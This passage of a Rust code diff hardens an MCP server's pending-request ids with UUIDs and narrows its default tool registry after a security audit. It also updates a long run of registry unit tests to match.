`Err(Declined)`. Kills the mutation by asserting @@ -448,12 +461,13 @@ mod tests { let handle = tokio::spawn(async move { service.elicit("Confirm?", None).await }); // Drain the outgoing request so the requester registers the pending id. - let _ = tokio::time::timeout(Duration::from_secs(2), rx.recv()) + let outbound = tokio::time::timeout(Duration::from_secs(2), rx.recv()) .await .expect("request sent") .expect("channel open"); + let id = extract_outbound_id(&outbound); - resolve_only_pending(&pending, serde_json::json!({"action": "decline"})); + resolve_only_pending(&pending, &id, serde_json::json!({"action": "decline"})); let result = tokio::time::timeout(Duration::from_secs(2), handle) .await @@ -474,12 +488,13 @@ mod tests { let handle = tokio::spawn(async move { service.elicit("Confirm?", None).await }); - let _ = tokio::time::timeout(Duration::from_secs(2), rx.recv()) + let outbound = tokio::time::timeout(Duration::from_secs(2), rx.recv()) .await .expect("request sent") .expect("channel open"); + let id = extract_outbound_id(&outbound); - resolve_only_pending(&pending, serde_json::json!({"action": "cancel"})); + resolve_only_pending(&pending, &id, serde_json::json!({"action": "cancel"})); let result = tokio::time::timeout(Duration::from_secs(2), handle) .await @@ -501,12 +516,13 @@ mod tests { let handle = tokio::spawn(async move { service.elicit_url("Open", "https://example.com").await }); - let _ = tokio::time::timeout(Duration::from_secs(2), rx.recv()) + let outbound = tokio::time::timeout(Duration::from_secs(2), rx.recv()) .await .expect("request sent") .expect("channel open"); + let id = extract_outbound_id(&outbound); - resolve_only_pending(&pending, serde_json::json!({"action": "decline"})); + resolve_only_pending(&pending, &id, serde_json::json!({"action": "decline"})); let result = tokio::time::timeout(Duration::from_secs(2), handle) .await @@ -526,12 +542,13 @@ mod tests { let handle = tokio::spawn(async move { service.elicit_url("Open", "https://example.com").await }); - let _ = tokio::time::timeout(Duration::from_secs(2), rx.recv()) + let outbound = tokio::time::timeout(Duration::from_secs(2), rx.recv()) .await .expect("request sent") .expect("channel open"); + let id = extract_outbound_id(&outbound); - resolve_only_pending(&pending, serde_json::json!({"action": "cancel"})); + resolve_only_pending(&pending, &id, serde_json::json!({"action": "cancel"})); let result = tokio::time::timeout(Duration::from_secs(2), handle) .await @@ -570,14 +587,15 @@ mod tests { let handle = tokio::spawn(async move { service.elicit("Confirm?", None).await }); - let _ = tokio::time::timeout(Duration::from_secs(2), rx.recv()) + let outbound = tokio::time::timeout(Duration::from_secs(2), rx.recv()) .await .expect("request sent") .expect("channel open"); + let id = extract_outbound_id(&outbound); // `ElicitationCreateResult` requires an `action` string field; // sending an integer makes `serde_json::from_value` fail. - resolve_only_pending(&pending, serde_json::json!(42)); + resolve_only_pending(&pending, &id, serde_json::json!(42)); let result = tokio::time::timeout(Duration::from_secs(2), handle) .await @@ -599,12 +617,13 @@ mod tests { let handle = tokio::spawn(async move { service.elicit_url("Open", "https://example.com").await }); - let _ = tokio::time::timeout(Duration::from_secs(2), rx.recv()) + let outbound = tokio::time::timeout(Duration::from_secs(2), rx.recv()) .await .expect("request sent") .expect("channel open"); + let id = extract_outbound_id(&outbound); - resolve_only_pending(&pending, serde_json::json!(42)); + resolve_only_pending(&pending, &id, serde_json::json!(42)); let result = tokio::time::timeout(Duration::from_secs(2), handle) .await diff --git a/src/mcp/meta_tools.rs b/src/mcp/meta_tools.rs index 05f88587..b0f9630d 100644 --- a/src/mcp/meta_tools.rs +++ b/src/mcp/meta_tools.rs @@ -261,7 +261,7 @@ fn success_json(value: Value) -> ToolCallResult { #[cfg(test)] mod tests { use super::*; - use crate::mcp::registry::create_default_registry; + use crate::mcp::registry::create_all_enabled_registry; #[test] fn is_meta_tool_recognises_all_three() { @@ -284,7 +284,7 @@ mod tests { #[test] fn list_groups_returns_structured_payload() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let result = execute(LIST_TOOL_GROUPS, None, ®istry).expect("meta tool"); let payload = result.structured_content.expect("structured"); assert!(payload["total_groups"].as_u64().unwrap() > 0); @@ -294,14 +294,14 @@ mod tests { #[test] fn search_requires_query() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let result = execute(SEARCH_TOOLS, Some(&json!({})), ®istry).expect("meta tool"); assert_eq!(result.is_error, Some(true)); } #[test] fn search_matches_on_name_substring() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let result = execute( SEARCH_TOOLS, Some(&json!({"query": "docker", "limit": 5})), @@ -324,7 +324,7 @@ mod tests { #[test] fn search_respects_group_filter() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let result = execute( SEARCH_TOOLS, Some(&json!({"query": "", "group": "docker", "limit": 50})), @@ -337,7 +337,7 @@ mod tests { #[test] fn describe_unknown_returns_error() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let result = execute( DESCRIBE_TOOL, Some(&json!({"name": "nonexistent_xyz"})), @@ -349,7 +349,7 @@ mod tests { #[test] fn describe_known_returns_schema() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); // Pick any real tool from the registry. let some_tool = registry .list_tools() @@ -375,7 +375,7 @@ mod tests { /// only return tools whose group **equals** the filter. #[test] fn search_with_group_filter_returns_only_matching_group() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let result = execute( SEARCH_TOOLS, Some(&json!({"query": "ps", "group": "docker", "limit": 50})), diff --git a/src/mcp/mod.rs b/src/mcp/mod.rs index f22e0744..a047567a 100644 --- a/src/mcp/mod.rs +++ b/src/mcp/mod.rs @@ -16,6 +16,8 @@ pub mod resource_registry; pub mod resources; pub mod sampling; mod server; +pub mod session_capabilities; +pub mod session_context; pub mod standard_tool; pub mod tool_handlers; pub mod transport; diff --git a/src/mcp/pending_requests.rs b/src/mcp/pending_requests.rs index cba46172..f98892be 100644 --- a/src/mcp/pending_requests.rs +++ b/src/mcp/pending_requests.rs @@ -7,7 +7,6 @@ use std::collections::HashMap; use std::sync::Mutex; -use std::sync::atomic::{AtomicU64, Ordering}; use serde_json::Value; use tokio::sync::oneshot; @@ -27,7 +26,6 @@ pub enum ClientResponse { /// Tracks server-to-client requests awaiting responses. pub struct PendingRequests { - next_id: AtomicU64, pending: Mutex>>, } @@ -36,17 +34,17 @@ impl PendingRequests { #[must_use] pub fn new() -> Self { Self { - next_id: AtomicU64::new(1), pending: Mutex::new(HashMap::new()), } } /// Create a new pending request. Returns (`request_id`, receiver). /// - /// IDs use `"srv-"` prefix to avoid collision with client-generated IDs. + /// IDs are `"srv-{uuid_v4_simple}"` — unguessable and unique. Combined with + /// the per-session allocation (Vuln 8 audit 2026-05-09) this prevents one + /// client from resolving another client's pending server-initiated request. pub fn create_request(&self) -> (String, oneshot::Receiver) { - let id_num = self.next_id.fetch_add(1, Ordering::Relaxed); - let id = format!("srv-{id_num}"); + let id = format!("srv-{}", uuid::Uuid::new_v4().simple()); let (tx, rx) = oneshot::channel(); let mut pending = self.pending.lock().expect("pending lock poisoned"); @@ -99,7 +97,17 @@ mod tests { let (id2, _rx2) = pr.create_request(); assert_ne!(id1, id2); assert!(id1.starts_with("srv-")); - assert!(id2.starts_with("srv-")); + assert!(id1.len() >= 32, "id should embed a UUID for unguessability"); + assert_ne!(id1, "srv-1"); + } + + #[test] + fn test_resolve_predictable_legacy_id_does_not_succeed() { + let pr = PendingRequests::new(); + let _ = pr.create_request(); + // Legacy ids "srv-1", "srv-2" must not match anything any more. + assert!(!pr.resolve("srv-1", ClientResponse::Success(serde_json::json!(null)))); + assert!(!pr.resolve("srv-2", ClientResponse::Success(serde_json::json!(null)))); } #[test] diff --git a/src/mcp/protocol.rs b/src/mcp/protocol.rs index bda54ad5..ecdbba5a 100644 --- a/src/mcp/protocol.rs +++ b/src/mcp/protocol.rs @@ -840,6 +840,12 @@ impl JsonRpcNotification { /// /// The writer task serializes both responses and unsolicited notifications /// to the same stdout stream. +/// +/// `Clone` is required for the per-session fanout introduced by +/// FIND-034 (audit 2026-05-09): the config watcher broadcasts a single +/// `WriterMessage` to every live session, and each `try_send` consumes +/// one copy. +#[derive(Clone)] pub enum WriterMessage { /// A JSON-RPC response to a client request. Response(Box), diff --git a/src/mcp/registry.rs b/src/mcp/registry.rs index 3c71800a..e53d16a6 100644 --- a/src/mcp/registry.rs +++ b/src/mcp/registry.rs @@ -389,12 +389,44 @@ pub fn tool_meta(tool_name: &str) -> Option { } } -/// Create a registry with all default tool handlers +/// Create a registry with the default tool group profile +/// (FIND-024: 8 minimal-profile groups; everything else is opt-in). #[must_use] pub fn create_default_registry() -> ToolRegistry { create_filtered_registry(&ToolGroupsConfig::default()) } +/// Create a registry with EVERY tool group enabled — the pre-FIND-024 default. +/// +/// Use only for tests that need to exercise the full inventory (e.g. +/// pagination, group dispatch, default-list assertions). Production code must +/// always use [`create_filtered_registry`] with the operator's `ToolGroupsConfig`. +#[must_use] +#[doc(hidden)] +pub fn create_all_enabled_registry() -> ToolRegistry { + let mut registry = ToolRegistry::new(); + for entry in inventory::iter::() { + registry.register((entry.factory)()); + } + registry +} + +/// Build a `ToolGroupsConfig` that explicitly enables every group registered +/// via `#[mcp_tool]` / `#[mcp_standard_tool]` — the pre-FIND-024 default. +/// +/// Use only for tests that need to exercise the full handler inventory +/// (e.g. pagination, group dispatch, all-tools-present assertions). +/// Production code must always use the operator-supplied `ToolGroupsConfig`. +#[must_use] +#[doc(hidden)] +pub fn all_enabled_tool_groups_config_for_test() -> ToolGroupsConfig { + let mut groups = HashMap::new(); + for entry in inventory::iter::() { + groups.insert(entry.group.to_string(), true); + } + ToolGroupsConfig { groups } +} + /// Create a registry filtered by the tool groups configuration. /// /// Only tools whose group is enabled in the config will be registered. @@ -501,8 +533,12 @@ mod tests { #[test] #[allow(clippy::too_many_lines)] - fn test_default_registry_has_all_tools() { - let registry = create_default_registry(); + fn test_all_enabled_registry_has_all_tools() { + // FIND-024: `create_default_registry()` now returns the minimal + // 8-group profile. This test exists to verify that every handler + // declared via `#[mcp_tool]` / `#[mcp_standard_tool]` is present + // when ALL groups are enabled, so we use `create_all_enabled_registry()`. + let registry = create_all_enabled_registry(); assert_eq!(registry.len(), all_tools_count()); // Core assert!(registry.get("ssh_exec").is_some()); @@ -1110,14 +1146,16 @@ mod tests { #[test] fn test_filtered_registry_all_enabled() { - let config = ToolGroupsConfig::default(); + // Pre-FIND-024 behaviour: a config that explicitly enables every + // group must register every tool from the inventory. + let config = all_enabled_tool_groups_config_for_test(); let registry = create_filtered_registry(&config); assert_eq!(registry.len(), all_tools_count()); } #[test] fn test_filtered_registry_disable_sessions() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("sessions".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1134,7 +1172,7 @@ mod tests { #[test] fn test_filtered_registry_disable_monitoring() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("monitoring".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1148,7 +1186,7 @@ mod tests { #[test] fn test_filtered_registry_disable_file_transfer() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("file_transfer".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1165,7 +1203,7 @@ mod tests { #[test] fn test_filtered_registry_disable_multiple_groups() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("sessions".to_string(), false); groups.insert("monitoring".to_string(), false); groups.insert("file_transfer".to_string(), false); @@ -1184,19 +1222,20 @@ mod tests { #[test] fn test_filtered_registry_explicit_enable() { - let mut groups = std::collections::HashMap::new(); + // FIND-024: explicit `true` for `core` + `sessions` on top of an + // all-enabled fixture is a no-op; every tool stays registered. + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("core".to_string(), true); groups.insert("sessions".to_string(), true); let config = ToolGroupsConfig { groups }; let registry = create_filtered_registry(&config); - // All groups enabled (unlisted default to true) assert_eq!(registry.len(), all_tools_count()); } #[test] fn test_filtered_registry_disable_tunnels() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("tunnels".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1212,7 +1251,7 @@ mod tests { #[test] fn test_filtered_registry_disable_kubernetes() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("kubernetes".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1244,7 +1283,7 @@ mod tests { #[test] fn test_filtered_registry_disable_ansible() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("ansible".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1267,7 +1306,7 @@ mod tests { #[test] fn test_filtered_registry_disable_awx() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("awx".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1294,7 +1333,7 @@ mod tests { #[test] fn test_filtered_registry_disable_docker() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("docker".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1319,7 +1358,7 @@ mod tests { #[test] fn test_filtered_registry_disable_esxi() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("esxi".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1341,7 +1380,7 @@ mod tests { #[test] fn test_filtered_registry_disable_git() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("git".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1362,7 +1401,7 @@ mod tests { #[test] fn test_filtered_registry_disable_systemd() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("systemd".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1383,7 +1422,7 @@ mod tests { #[test] fn test_filtered_registry_disable_network() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("network".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1401,7 +1440,7 @@ mod tests { #[test] fn test_filtered_registry_disable_process() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("process".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1416,7 +1455,7 @@ mod tests { #[test] fn test_filtered_registry_disable_package() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("package".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1433,7 +1472,7 @@ mod tests { #[test] fn test_filtered_registry_disable_firewall() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("firewall".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1449,7 +1488,7 @@ mod tests { #[test] fn test_filtered_registry_disable_cron() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("cron".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1464,7 +1503,7 @@ mod tests { #[test] fn test_filtered_registry_disable_certificates() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("certificates".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1482,7 +1521,7 @@ mod tests { #[test] fn test_filtered_registry_disable_nginx() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("nginx".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1498,7 +1537,7 @@ mod tests { #[test] fn test_filtered_registry_disable_redis() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("redis".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1513,7 +1552,7 @@ mod tests { #[test] fn test_filtered_registry_disable_terraform() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("terraform".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1530,7 +1569,7 @@ mod tests { #[test] fn test_filtered_registry_disable_vault() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("vault".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1546,7 +1585,7 @@ mod tests { #[test] fn test_filtered_registry_disable_config() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("config".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1562,7 +1601,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_services() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_services".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1585,7 +1624,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_events() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_events".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1605,7 +1644,7 @@ mod tests { #[test] fn test_filtered_registry_disable_active_directory() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("active_directory".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1626,7 +1665,7 @@ mod tests { #[test] fn test_filtered_registry_disable_scheduled_tasks() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("scheduled_tasks".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1646,7 +1685,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_firewall() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_firewall".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1666,7 +1705,7 @@ mod tests { #[test] fn test_filtered_registry_disable_iis() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("iis".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1684,7 +1723,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_updates() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_updates".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1704,7 +1743,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_perf() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_perf".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1725,7 +1764,7 @@ mod tests { #[test] fn test_filtered_registry_disable_hyperv() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("hyperv".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1745,7 +1784,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_registry() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_registry".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1765,7 +1804,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_features() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_features".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1784,7 +1823,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_network() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_network".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1805,7 +1844,7 @@ mod tests { #[test] fn test_filtered_registry_disable_windows_process() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("windows_process".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1825,7 +1864,7 @@ mod tests { #[test] fn test_filtered_registry_disable_directory() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("directory".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1839,7 +1878,7 @@ mod tests { #[test] fn test_filtered_registry_disable_database() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("database".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1854,7 +1893,7 @@ mod tests { #[test] fn test_filtered_registry_disable_backup() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("backup".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1872,7 +1911,7 @@ mod tests { #[test] fn test_filtered_registry_disable_cron_analysis() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("cron_analysis".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1890,7 +1929,7 @@ mod tests { #[test] fn test_filtered_registry_disable_performance() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("performance".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1909,7 +1948,7 @@ mod tests { #[test] fn test_filtered_registry_disable_container_logs() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("container_logs".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1928,7 +1967,7 @@ mod tests { #[test] fn test_filtered_registry_disable_network_security() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("network_security".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1947,7 +1986,7 @@ mod tests { #[test] fn test_filtered_registry_disable_compliance() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("compliance".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1963,7 +2002,7 @@ mod tests { #[test] fn test_filtered_registry_disable_alerting() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("alerting".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1978,7 +2017,7 @@ mod tests { #[test] fn test_filtered_registry_disable_capacity() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("capacity".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -1993,7 +2032,7 @@ mod tests { #[test] fn test_filtered_registry_disable_incident() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("incident".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2007,7 +2046,7 @@ mod tests { #[test] fn test_filtered_registry_disable_log_aggregation() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("log_aggregation".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2025,7 +2064,7 @@ mod tests { #[test] fn test_filtered_registry_disable_key_management() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("key_management".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2043,7 +2082,7 @@ mod tests { #[test] fn test_filtered_registry_disable_chatops() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("chatops".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2057,7 +2096,7 @@ mod tests { #[test] fn test_filtered_registry_disable_templates() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("templates".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2074,7 +2113,7 @@ mod tests { #[test] fn test_filtered_registry_disable_pty() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("pty".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2089,7 +2128,7 @@ mod tests { #[test] fn test_filtered_registry_disable_cloud() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("cloud".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2105,7 +2144,7 @@ mod tests { #[test] fn test_filtered_registry_disable_inventory() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("inventory".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2120,7 +2159,7 @@ mod tests { #[test] fn test_filtered_registry_disable_multicloud() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("multicloud".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2135,7 +2174,7 @@ mod tests { #[test] fn test_filtered_registry_disable_postgresql() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("postgresql".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2149,7 +2188,7 @@ mod tests { #[test] fn test_filtered_registry_disable_mysql() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("mysql".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2163,7 +2202,7 @@ mod tests { #[test] fn test_filtered_registry_disable_apache() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("apache".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2177,7 +2216,7 @@ mod tests { #[test] fn test_filtered_registry_disable_letsencrypt() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("letsencrypt".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2193,7 +2232,7 @@ mod tests { #[test] fn test_filtered_registry_disable_mongodb() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("mongodb".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2206,7 +2245,7 @@ mod tests { #[test] fn test_filtered_registry_disable_diagnostics() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("diagnostics".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2224,7 +2263,7 @@ mod tests { #[test] fn test_filtered_registry_disable_runbooks() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("runbooks".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2239,7 +2278,7 @@ mod tests { #[test] fn test_filtered_registry_disable_recording() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("recording".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2256,7 +2295,7 @@ mod tests { #[test] fn test_filtered_registry_disable_orchestration() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("orchestration".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2274,7 +2313,7 @@ mod tests { #[test] fn test_filtered_registry_disable_drift() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("drift".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2289,7 +2328,7 @@ mod tests { #[test] fn test_filtered_registry_disable_security_scan() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("security_scan".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2307,7 +2346,7 @@ mod tests { #[test] fn test_filtered_registry_disable_file_ops() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("file_ops".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2328,7 +2367,7 @@ mod tests { #[test] fn test_filtered_registry_disable_user_management() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("user_management".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2351,7 +2390,7 @@ mod tests { #[test] fn test_filtered_registry_disable_storage() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("storage".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2370,7 +2409,7 @@ mod tests { #[test] fn test_filtered_registry_disable_journald() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("journald".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2386,7 +2425,7 @@ mod tests { #[test] fn test_filtered_registry_disable_systemd_timers() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("systemd_timers".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2406,7 +2445,7 @@ mod tests { #[test] fn test_filtered_registry_disable_security_modules() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("security_modules".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2426,7 +2465,7 @@ mod tests { #[test] fn test_filtered_registry_disable_network_equipment() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("network_equipment".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2449,7 +2488,7 @@ mod tests { #[test] fn test_filtered_registry_disable_podman() { - let mut groups = std::collections::HashMap::new(); + let mut groups = 